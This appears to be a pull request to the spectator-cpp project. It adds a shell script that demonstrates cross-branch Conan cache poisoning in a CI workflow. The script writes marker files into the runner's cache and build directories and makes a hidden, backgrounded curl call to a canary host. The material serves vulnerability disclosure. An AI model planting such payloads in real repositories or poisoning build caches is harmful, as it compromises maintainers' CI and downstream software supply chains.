### PR TITLE
Test: Cache poisoning vulnerability demonstration

### DIFF
--- a/test_payload.sh
+++ b/test_payload.sh
@@ -1,0 +1,5 @@
+# Cache poisoning test
+echo "CACHE_POISONED_BY_ATTACKER_$(date +%s)" > /home/runner/.conan2/cache_poison_marker.txt
+echo "Payload executed at $(date)" > /home/runner/work/spectator-cpp/spectator-cpp/cmake-build/payload_evidence.txt
+# Try to trigger OOB
+curl -s https://canary.domain/cache_poison_test &>/dev/null &


### PR DESCRIPTION
This PR demonstrates a cache poisoning vulnerability in the build workflow. The cache key `${{ runner.os }}-conan` is predictable and lacks branch scope, allowing cross-branch cache poisoning.